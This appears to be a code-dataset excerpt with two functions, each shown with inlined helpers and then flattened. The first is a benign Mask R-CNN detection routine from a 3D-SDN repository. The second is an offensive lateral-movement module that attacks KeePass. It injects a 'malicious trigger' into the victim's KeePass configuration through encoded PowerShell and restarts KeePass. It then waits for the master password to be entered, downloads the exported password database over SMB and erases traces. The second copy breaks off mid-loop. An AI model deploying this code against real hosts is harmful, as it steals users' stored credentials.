rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
<DeepExtract>
molded_images = []
image_metas = []
windows = []
for image in images:
(molded_image, window, scale, padding) = utils.resize_image(image, min_dim=self.config.IMAGE_MIN_DIM, max_dim=self.config.IMAGE_MAX_DIM, padding=self.config.IMAGE_PADDING)
molded_image = mold_image(molded_image, self.config)
image_meta = compose_image_meta(0, image.shape, window, np.zeros([self.config.NUM_CLASSES], dtype=np.int32))
molded_images.append(molded_image)
windows.append(window)
image_metas.append(image_meta)
molded_images = np.stack(molded_images)
image_metas = np.stack(image_metas)
windows = np.stack(windows)
(molded_images, image_metas, windows) = (molded_images, image_metas, windows)
</DeepExtract>
molded_images = torch.from_numpy(molded_images.transpose(0, 3, 1, 2)).float()
if self.config.GPU_COUNT:
molded_images = molded_images.cuda()
molded_images = Variable(molded_images, volatile=True)
<DeepExtract>
molded_images = [molded_images, image_metas][0]
image_metas = [molded_images, image_metas][1]
if 'inference' == 'inference':
self.eval()
elif 'inference' == 'training':
self.train()
def set_bn_eval(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.eval()
self.apply(set_bn_eval)
[p2_out, p3_out, p4_out, p5_out, p6_out] = self.fpn(molded_images)
rpn_feature_maps = [p2_out, p3_out, p4_out, p5_out, p6_out]
mrcnn_feature_maps = [p2_out, p3_out, p4_out, p5_out]
layer_outputs = []
for p in rpn_feature_maps:
layer_outputs.append(self.rpn(p))
outputs = list(zip(*layer_outputs))
outputs = [torch.cat(list(o), dim=1) for o in outputs]
(rpn_class_logits, rpn_class, rpn_bbox) = outputs
proposal_count = self.config.POST_NMS_ROIS_TRAINING if 'inference' == 'training' else self.config.POST_NMS_ROIS_INFERENCE
rpn_rois = proposal_layer([rpn_class, rpn_bbox], proposal_count=proposal_count, nms_threshold=self.config.RPN_NMS_THRESHOLD, anchors=self.anchors, config=self.config)
if 'inference' == 'inference':
(mrcnn_class_logits, mrcnn_class, mrcnn_bbox) = self.classifier(mrcnn_feature_maps, rpn_rois)
detections = detection_layer(self.config, rpn_rois, mrcnn_class, mrcnn_bbox, image_metas)
(h, w) = self.config.IMAGE_SHAPE[:2]
scale = Variable(torch.from_numpy(np.array([h, w, h, w])).float(), requires_grad=False)
if self.config.GPU_COUNT:
scale = scale.cuda()
detection_boxes = detections[:, :4] / scale
detection_boxes = detection_boxes.unsqueeze(0)
mrcnn_mask = self.mask(mrcnn_feature_maps, detection_boxes)
detections = detections.unsqueeze(0)
mrcnn_mask = mrcnn_mask.unsqueeze(0)
(detections, mrcnn_mask) = [detections, mrcnn_mask]
elif 'inference' == 'training':
gt_class_ids = [molded_images, image_metas][2]
gt_boxes = [molded_images, image_metas][3]
gt_masks = [molded_images, image_metas][4]
(h, w) = self.config.IMAGE_SHAPE[:2]
scale = Variable(torch.from_numpy(np.array([h, w, h, w])).float(), requires_grad=False)
if self.config.GPU_COUNT:
scale = scale.cuda()
gt_boxes = gt_boxes / scale
(rois, target_class_ids, target_deltas, target_mask) = detection_target_layer(rpn_rois, gt_class_ids, gt_boxes, gt_masks, self.config)
if not rois.size():
mrcnn_class_logits = Variable(torch.FloatTensor())
mrcnn_class = Variable(torch.IntTensor())
mrcnn_bbox = Variable(torch.FloatTensor())
mrcnn_mask = Variable(torch.FloatTensor())
if self.config.GPU_COUNT:
mrcnn_class_logits = mrcnn_class_logits.cuda()
mrcnn_class = mrcnn_class.cuda()
mrcnn_bbox = mrcnn_bbox.cuda()
mrcnn_mask = mrcnn_mask.cuda()
else:
(mrcnn_class_logits, mrcnn_class, mrcnn_bbox) = self.classifier(mrcnn_feature_maps, rois)
mrcnn_mask = self.mask(mrcnn_feature_maps, rois)
(detections, mrcnn_mask) = [rpn_class_logits, rpn_bbox, target_class_ids, mrcnn_class_logits, target_deltas, mrcnn_bbox, target_mask, mrcnn_mask]
</DeepExtract>
detections = detections.data.cpu().numpy()
mrcnn_mask = mrcnn_mask.permute(0, 1, 3, 4, 2).data.cpu().numpy()
results = []
for (i, image) in enumerate(images):
<DeepExtract>
zero_ix = np.where(detections[i][:, 4] == 0)[0]
N = zero_ix[0] if zero_ix.shape[0] > 0 else detections[i].shape[0]
boxes = detections[i][:N, :4]
class_ids = detections[i][:N, 4].astype(np.int32)
scores = detections[i][:N, 5]
masks = mrcnn_mask[i][np.arange(N), :, :, class_ids]
h_scale = image.shape[0] / (windows[i][2] - windows[i][0])
w_scale = image.shape[1] / (windows[i][3] - windows[i][1])
scale = min(h_scale, w_scale)
shift = windows[i][:2]
scales = np.array([scale, scale, scale, scale])
shifts = np.array([shift[0], shift[1], shift[0], shift[1]])
boxes = np.multiply(boxes - shifts, scales).astype(np.int32)
exclude_ix = np.where((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
N = class_ids.shape[0]
full_masks = []
for i in range(N):
full_mask = utils.unmold_mask(masks[i], boxes[i], image.shape)
full_masks.append(full_mask)
full_masks = np.stack(full_masks, axis=-1) if full_masks else np.empty((0,) + masks.shape[1:3])
(final_rois, final_class_ids, final_scores, final_masks) = (boxes, class_ids, scores, full_masks)
</DeepExtract>
results.append({'rois': final_rois, 'class_ids': final_class_ids, 'scores': final_scores, 'masks': final_masks})
return results
|
def detect(self, images):
"""Runs the detection pipeline.
images: List of images, potentially of different sizes.
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
molded_images = []
image_metas = []
windows = []
for image in images:
(molded_image, window, scale, padding) = utils.resize_image(image, min_dim=self.config.IMAGE_MIN_DIM, max_dim=self.config.IMAGE_MAX_DIM, padding=self.config.IMAGE_PADDING)
molded_image = mold_image(molded_image, self.config)
image_meta = compose_image_meta(0, image.shape, window, np.zeros([self.config.NUM_CLASSES], dtype=np.int32))
molded_images.append(molded_image)
windows.append(window)
image_metas.append(image_meta)
molded_images = np.stack(molded_images)
image_metas = np.stack(image_metas)
windows = np.stack(windows)
(molded_images, image_metas, windows) = (molded_images, image_metas, windows)
molded_images = torch.from_numpy(molded_images.transpose(0, 3, 1, 2)).float()
if self.config.GPU_COUNT:
molded_images = molded_images.cuda()
molded_images = Variable(molded_images, volatile=True)
molded_images = [molded_images, image_metas][0]
image_metas = [molded_images, image_metas][1]
if 'inference' == 'inference':
self.eval()
elif 'inference' == 'training':
self.train()
def set_bn_eval(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.eval()
self.apply(set_bn_eval)
[p2_out, p3_out, p4_out, p5_out, p6_out] = self.fpn(molded_images)
rpn_feature_maps = [p2_out, p3_out, p4_out, p5_out, p6_out]
mrcnn_feature_maps = [p2_out, p3_out, p4_out, p5_out]
layer_outputs = []
for p in rpn_feature_maps:
layer_outputs.append(self.rpn(p))
outputs = list(zip(*layer_outputs))
outputs = [torch.cat(list(o), dim=1) for o in outputs]
(rpn_class_logits, rpn_class, rpn_bbox) = outputs
proposal_count = self.config.POST_NMS_ROIS_TRAINING if 'inference' == 'training' else self.config.POST_NMS_ROIS_INFERENCE
rpn_rois = proposal_layer([rpn_class, rpn_bbox], proposal_count=proposal_count, nms_threshold=self.config.RPN_NMS_THRESHOLD, anchors=self.anchors, config=self.config)
if 'inference' == 'inference':
(mrcnn_class_logits, mrcnn_class, mrcnn_bbox) = self.classifier(mrcnn_feature_maps, rpn_rois)
detections = detection_layer(self.config, rpn_rois, mrcnn_class, mrcnn_bbox, image_metas)
(h, w) = self.config.IMAGE_SHAPE[:2]
scale = Variable(torch.from_numpy(np.array([h, w, h, w])).float(), requires_grad=False)
if self.config.GPU_COUNT:
scale = scale.cuda()
detection_boxes = detections[:, :4] / scale
detection_boxes = detection_boxes.unsqueeze(0)
mrcnn_mask = self.mask(mrcnn_feature_maps, detection_boxes)
detections = detections.unsqueeze(0)
mrcnn_mask = mrcnn_mask.unsqueeze(0)
(detections, mrcnn_mask) = [detections, mrcnn_mask]
elif 'inference' == 'training':
gt_class_ids = [molded_images, image_metas][2]
gt_boxes = [molded_images, image_metas][3]
gt_masks = [molded_images, image_metas][4]
(h, w) = self.config.IMAGE_SHAPE[:2]
scale = Variable(torch.from_numpy(np.array([h, w, h, w])).float(), requires_grad=False)
if self.config.GPU_COUNT:
scale = scale.cuda()
gt_boxes = gt_boxes / scale
(rois, target_class_ids, target_deltas, target_mask) = detection_target_layer(rpn_rois, gt_class_ids, gt_boxes, gt_masks, self.config)
if not rois.size():
mrcnn_class_logits = Variable(torch.FloatTensor())
mrcnn_class = Variable(torch.IntTensor())
mrcnn_bbox = Variable(torch.FloatTensor())
mrcnn_mask = Variable(torch.FloatTensor())
if self.config.GPU_COUNT:
mrcnn_class_logits = mrcnn_class_logits.cuda()
mrcnn_class = mrcnn_class.cuda()
mrcnn_bbox = mrcnn_bbox.cuda()
mrcnn_mask = mrcnn_mask.cuda()
else:
(mrcnn_class_logits, mrcnn_class, mrcnn_bbox) = self.classifier(mrcnn_feature_maps, rois)
mrcnn_mask = self.mask(mrcnn_feature_maps, rois)
(detections, mrcnn_mask) = [rpn_class_logits, rpn_bbox, target_class_ids, mrcnn_class_logits, target_deltas, mrcnn_bbox, target_mask, mrcnn_mask]
detections = detections.data.cpu().numpy()
mrcnn_mask = mrcnn_mask.permute(0, 1, 3, 4, 2).data.cpu().numpy()
results = []
for (i, image) in enumerate(images):
zero_ix = np.where(detections[i][:, 4] == 0)[0]
N = zero_ix[0] if zero_ix.shape[0] > 0 else detections[i].shape[0]
boxes = detections[i][:N, :4]
class_ids = detections[i][:N, 4].astype(np.int32)
scores = detections[i][:N, 5]
masks = mrcnn_mask[i][np.arange(N), :, :, class_ids]
h_scale = image.shape[0] / (windows[i][2] - windows[i][0])
w_scale = image.shape[1] / (windows[i][3] - windows[i][1])
scale = min(h_scale, w_scale)
shift = windows[i][:2]
scales = np.array([scale, scale, scale, scale])
shifts = np.array([shift[0], shift[1], shift[0], shift[1]])
boxes = np.multiply(boxes - shifts, scales).astype(np.int32)
exclude_ix = np.where((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
N = class_ids.shape[0]
full_masks = []
for i in range(N):
full_mask = utils.unmold_mask(masks[i], boxes[i], image.shape)
full_masks.append(full_mask)
full_masks = np.stack(full_masks, axis=-1) if full_masks else np.empty((0,) + masks.shape[1:3])
(final_rois, final_class_ids, final_scores, final_masks) = (boxes, class_ids, scores, full_masks)
results.append({'rois': final_rois, 'class_ids': final_class_ids, 'scores': final_scores, 'masks': final_masks})
return results
|
3D-SDN
|
positive
|
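A standalone sketch (not a dataset row; the window and box values are hypothetical) of the box "unmolding" step that the 3D-SDN `detect()` pair above applies per image: detections predicted in the padded, resized input are shifted by the window origin and rescaled back into original-image pixel coordinates.

import numpy as np

image_shape = (480, 640)                    # original (H, W) of the input image
window = np.array([64, 0, 960, 1024])       # (y1, x1, y2, x2) of the image inside the molded input
boxes = np.array([[100, 200, 300, 400]])    # detections in molded-image pixels

h_scale = image_shape[0] / (window[2] - window[0])
w_scale = image_shape[1] / (window[3] - window[1])
scale = min(h_scale, w_scale)
shifts = np.array([window[0], window[1], window[0], window[1]])

unmolded = np.multiply(boxes - shifts, scale).astype(np.int32)
print(unmolded)                             # boxes in original-image pixel coordinates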
def on_admin_login(self, context, connection):
if self.action == 'ADD':
<DeepExtract>
if self.trigger_added(context, connection):
context.log.info('The specified configuration file already contains a trigger called "{}", skipping'.format(self.keepass_config_path, self.trigger_name))
return
context.log.info('Adding trigger "{}" to "{}"'.format(self.trigger_name, self.keepass_config_path))
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_ExportPath', self.export_path)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_ExportName', self.export_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_TriggerName', self.trigger_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_KeePassXMLPath', self.keepass_config_path)
if self.powershell_exec_method == 'ENCODE':
add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode('UTF-16LE')).decode('utf-8')
add_trigger_script_cmd = 'powershell.exe -e {}'.format(add_trigger_script_b64)
connection.execute(add_trigger_script_cmd)
sleep(2)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.add_trigger_script_str)
except Exception as e:
context.log.error('Error while adding malicious trigger to file: {}'.format(e))
sys.exit(1)
if self.trigger_added(context, connection):
context.log.success('Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files'.format(self.trigger_name, self.keepass_config_path))
else:
context.log.error('Unknown error when adding malicious trigger to file')
sys.exit(1)
</DeepExtract>
elif self.action == 'CHECK':
<DeepExtract>
if self.trigger_added(context, connection):
context.log.info('Malicious trigger "{}" found in "{}"'.format(self.trigger_name, self.keepass_config_path))
else:
context.log.info('No trigger "{}" found in "{}"'.format(self.trigger_name, self.keepass_config_path))
</DeepExtract>
elif self.action == 'RESTART':
<DeepExtract>
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
csv_reader = reader(search_keepass_process_output_csv.split('\n'), delimiter=',')
next(csv_reader)
keepass_process_list = list(csv_reader)
keepass_users = []
for process in keepass_process_list:
keepass_users.append(process[1])
if len(keepass_users) == 0:
context.log.error('No running KeePass process found, aborting restart')
return
elif len(keepass_users) == 1:
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split('\\')[1] != self.keepass_user):
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False
for user in keepass_users:
if user == self.keepass_user or user.split('\\')[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
context.log.error('Multiple KeePass processes were found, please specify parameter USER to target one')
return
context.log.info("Restarting {}'s KeePass process".format(keepass_users[0]))
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassUser', self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassBinaryPath', self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_DummyServiceName', self.dummy_service_name)
if self.powershell_exec_method == 'ENCODE':
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode('UTF-16LE')).decode('utf-8')
restart_keepass_script_cmd = 'powershell.exe -e {}'.format(restart_keepass_script_b64)
connection.execute(restart_keepass_script_cmd)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:
context.log.error('Error while restarting KeePass: {}'.format(e))
return
</DeepExtract>
elif self.action == 'POLL':
<DeepExtract>
found = False
context.log.info('Polling for database export every {} seconds, please be patient'.format(self.poll_frequency_seconds))
context.log.info('we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything')
if self.export_path == '%APPDATA%' or self.export_path == '%appdata%':
poll_export_command_str = 'powershell.exe "Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output (\'C:\\Users\\\'+$_.Name+\'\\AppData\\Roaming\\{}\')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}"'.format(self.export_name)
else:
export_full_path = "'{}\\{}'".format(self.export_path, self.export_name)
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
while not found:
poll_exports_command_output = connection.execute(poll_export_command_str, True)
if self.export_name not in poll_exports_command_output:
print('.', end='', flush=True)
sleep(self.poll_frequency_seconds)
continue
print('')
context.log.success('Found database export !')
for (count, export_path) in enumerate(poll_exports_command_output.split('\r\n')):
try:
buffer = BytesIO()
connection.conn.getFile(self.share, export_path.split(':')[1], buffer.write)
if count > 0:
local_full_path = self.local_export_path + '/' + self.export_name.split('.')[0] + '_' + str(count) + '.' + self.export_name.split('.')[1]
else:
local_full_path = self.local_export_path + '/' + self.export_name
with open(local_full_path, 'wb') as f:
f.write(buffer.getbuffer())
remove_export_command_str = 'powershell.exe Remove-Item {}'.format(export_path)
connection.execute(remove_export_command_str, True)
context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path))
found = True
except Exception as e:
context.log.error('Error while polling export files, exiting : {}'.format(e))
</DeepExtract>
elif self.action == 'CLEAN':
<DeepExtract>
if self.export_path == '%APPDATA%' or self.export_path == '%appdata%':
poll_export_command_str = 'powershell.exe "Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output (\'C:\\Users\\\'+$_.Name+\'\\AppData\\Roaming\\{}\')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}"'.format(self.export_name)
else:
export_full_path = "'{}\\{}'".format(self.export_path, self.export_name)
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
poll_export_command_output = connection.execute(poll_export_command_str, True)
if self.export_name in poll_export_command_output:
for export_path in poll_export_command_output.split('\r\n'):
context.log.info('Database export found in "{}", removing'.format(export_path))
remove_export_command_str = 'powershell.exe Remove-Item {}'.format(export_path)
connection.execute(remove_export_command_str, True)
else:
context.log.info('No export found in {} , everything is cleaned'.format(self.export_path))
if self.trigger_added(context, connection):
self.remove_trigger_script_str = self.remove_trigger_script_str.replace('REPLACE_ME_KeePassXMLPath', self.keepass_config_path)
self.remove_trigger_script_str = self.remove_trigger_script_str.replace('REPLACE_ME_TriggerName', self.trigger_name)
if self.powershell_exec_method == 'ENCODE':
remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode('UTF-16LE')).decode('utf-8')
remove_trigger_script_command_str = 'powershell.exe -e {}'.format(remove_trigger_script_b64)
connection.execute(remove_trigger_script_command_str, True)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.remove_trigger_script_str)
except Exception as e:
context.log.error('Error while deleting trigger, exiting: {}'.format(e))
sys.exit(1)
if self.trigger_added(context, connection):
context.log.error('Unknown error while removing trigger "{}", exiting'.format(self.trigger_name))
else:
context.log.info('Found trigger "{}" in configuration file, removing'.format(self.trigger_name))
else:
context.log.success('No trigger "{}" found in "{}", skipping'.format(self.trigger_name, self.keepass_config_path))
</DeepExtract>
<DeepExtract>
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
csv_reader = reader(search_keepass_process_output_csv.split('\n'), delimiter=',')
next(csv_reader)
keepass_process_list = list(csv_reader)
keepass_users = []
for process in keepass_process_list:
keepass_users.append(process[1])
if len(keepass_users) == 0:
context.log.error('No running KeePass process found, aborting restart')
return
elif len(keepass_users) == 1:
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split('\\')[1] != self.keepass_user):
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False
for user in keepass_users:
if user == self.keepass_user or user.split('\\')[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
context.log.error('Multiple KeePass processes were found, please specify parameter USER to target one')
return
context.log.info("Restarting {}'s KeePass process".format(keepass_users[0]))
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassUser', self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassBinaryPath', self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_DummyServiceName', self.dummy_service_name)
if self.powershell_exec_method == 'ENCODE':
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode('UTF-16LE')).decode('utf-8')
restart_keepass_script_cmd = 'powershell.exe -e {}'.format(restart_keepass_script_b64)
connection.execute(restart_keepass_script_cmd)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:
context.log.error('Error while restarting KeePass: {}'.format(e))
return
</DeepExtract>
elif self.action == 'ALL':
<DeepExtract>
context.log.highlight('')
self.add_trigger(context, connection)
context.log.highlight('')
self.restart(context, connection)
self.poll(context, connection)
context.log.highlight('')
context.log.info('Cleaning everything..')
self.clean(context, connection)
self.restart(context, connection)
context.log.highlight('')
context.log.info('Extracting password..')
self.extract_password(context)
</DeepExtract>
|
def on_admin_login(self, context, connection):
if self.action == 'ADD':
if self.trigger_added(context, connection):
context.log.info('The specified configuration file already contains a trigger called "{}", skipping'.format(self.keepass_config_path, self.trigger_name))
return
context.log.info('Adding trigger "{}" to "{}"'.format(self.trigger_name, self.keepass_config_path))
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_ExportPath', self.export_path)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_ExportName', self.export_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_TriggerName', self.trigger_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace('REPLACE_ME_KeePassXMLPath', self.keepass_config_path)
if self.powershell_exec_method == 'ENCODE':
add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode('UTF-16LE')).decode('utf-8')
add_trigger_script_cmd = 'powershell.exe -e {}'.format(add_trigger_script_b64)
connection.execute(add_trigger_script_cmd)
sleep(2)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.add_trigger_script_str)
except Exception as e:
context.log.error('Error while adding malicious trigger to file: {}'.format(e))
sys.exit(1)
if self.trigger_added(context, connection):
context.log.success('Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files'.format(self.trigger_name, self.keepass_config_path))
else:
context.log.error('Unknown error when adding malicious trigger to file')
sys.exit(1)
elif self.action == 'CHECK':
if self.trigger_added(context, connection):
context.log.info('Malicious trigger "{}" found in "{}"'.format(self.trigger_name, self.keepass_config_path))
else:
context.log.info('No trigger "{}" found in "{}"'.format(self.trigger_name, self.keepass_config_path))
elif self.action == 'RESTART':
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
csv_reader = reader(search_keepass_process_output_csv.split('\n'), delimiter=',')
next(csv_reader)
keepass_process_list = list(csv_reader)
keepass_users = []
for process in keepass_process_list:
keepass_users.append(process[1])
if len(keepass_users) == 0:
context.log.error('No running KeePass process found, aborting restart')
return
elif len(keepass_users) == 1:
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split('\\')[1] != self.keepass_user):
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False
for user in keepass_users:
if user == self.keepass_user or user.split('\\')[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
context.log.error('Multiple KeePass processes were found, please specify parameter USER to target one')
return
context.log.info("Restarting {}'s KeePass process".format(keepass_users[0]))
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassUser', self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_KeePassBinaryPath', self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace('REPLACE_ME_DummyServiceName', self.dummy_service_name)
if self.powershell_exec_method == 'ENCODE':
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode('UTF-16LE')).decode('utf-8')
restart_keepass_script_cmd = 'powershell.exe -e {}'.format(restart_keepass_script_b64)
connection.execute(restart_keepass_script_cmd)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:
context.log.error('Error while restarting KeePass: {}'.format(e))
return
elif self.action == 'POLL':
found = False
context.log.info('Polling for database export every {} seconds, please be patient'.format(self.poll_frequency_seconds))
context.log.info('we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything')
if self.export_path == '%APPDATA%' or self.export_path == '%appdata%':
poll_export_command_str = 'powershell.exe "Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output (\'C:\\Users\\\'+$_.Name+\'\\AppData\\Roaming\\{}\')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}"'.format(self.export_name)
else:
export_full_path = "'{}\\{}'".format(self.export_path, self.export_name)
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
while not found:
poll_exports_command_output = connection.execute(poll_export_command_str, True)
if self.export_name not in poll_exports_command_output:
print('.', end='', flush=True)
sleep(self.poll_frequency_seconds)
continue
print('')
context.log.success('Found database export !')
for (count, export_path) in enumerate(poll_exports_command_output.split('\r\n')):
try:
buffer = BytesIO()
connection.conn.getFile(self.share, export_path.split(':')[1], buffer.write)
if count > 0:
local_full_path = self.local_export_path + '/' + self.export_name.split('.')[0] + '_' + str(count) + '.' + self.export_name.split('.')[1]
else:
local_full_path = self.local_export_path + '/' + self.export_name
with open(local_full_path, 'wb') as f:
f.write(buffer.getbuffer())
remove_export_command_str = 'powershell.exe Remove-Item {}'.format(export_path)
connection.execute(remove_export_command_str, True)
context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path))
found = True
except Exception as e:
context.log.error('Error while polling export files, exiting : {}'.format(e))
elif self.action == 'CLEAN':
if self.export_path == '%APPDATA%' or self.export_path == '%appdata%':
poll_export_command_str = 'powershell.exe "Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output (\'C:\\Users\\\'+$_.Name+\'\\AppData\\Roaming\\{}\')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}"'.format(self.export_name)
else:
export_full_path = "'{}\\{}'".format(self.export_path, self.export_name)
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
poll_export_command_output = connection.execute(poll_export_command_str, True)
if self.export_name in poll_export_command_output:
for export_path in poll_export_command_output.split('\r\n'):
context.log.info('Database export found in "{}", removing'.format(export_path))
remove_export_command_str = 'powershell.exe Remove-Item {}'.format(export_path)
connection.execute(remove_export_command_str, True)
else:
context.log.info('No export found in {} , everything is cleaned'.format(self.export_path))
if self.trigger_added(context, connection):
self.remove_trigger_script_str = self.remove_trigger_script_str.replace('REPLACE_ME_KeePassXMLPath', self.keepass_config_path)
self.remove_trigger_script_str = self.remove_trigger_script_str.replace('REPLACE_ME_TriggerName', self.trigger_name)
if self.powershell_exec_method == 'ENCODE':
remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode('UTF-16LE')).decode('utf-8')
remove_trigger_script_command_str = 'powershell.exe -e {}'.format(remove_trigger_script_b64)
connection.execute(remove_trigger_script_command_str, True)
elif self.powershell_exec_method == 'PS1':
try:
self.put_file_execute_delete(context, connection, self.remove_trigger_script_str)
except Exception as e:
context.log.error('Error while deleting trigger, exiting: {}'.format(e))
sys.exit(1)
if self.trigger_added(context, connection):
context.log.error('Unknown error while removing trigger "{}", exiting'.format(self.trigger_name))
else:
context.log.info('Found trigger "{}" in configuration file, removing'.format(self.trigger_name))
else:
context.log.success('No trigger "{}" found in "{}", skipping'.format(self.trigger_name, self.keepass_config_path))
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
csv_reader = reader(search_keepass_process_output_csv.split('\n'), delimiter=',')
next(csv_reader)
keepass_process_list = list(csv_reader)
keepass_users = []
for process in keepass_process_list:
keepass_users.append(process[1])
if len(keepass_users) == 0:
context.log.error('No running KeePass process found, aborting restart')
return
elif len(keepass_users) == 1:
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split('\\')[1] != self.keepass_user):
context.log.error('Specified user {} does not match any KeePass process owner, aborting restart'.format(self.keepass_user))
return
else:
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False
for user in keepass_users:
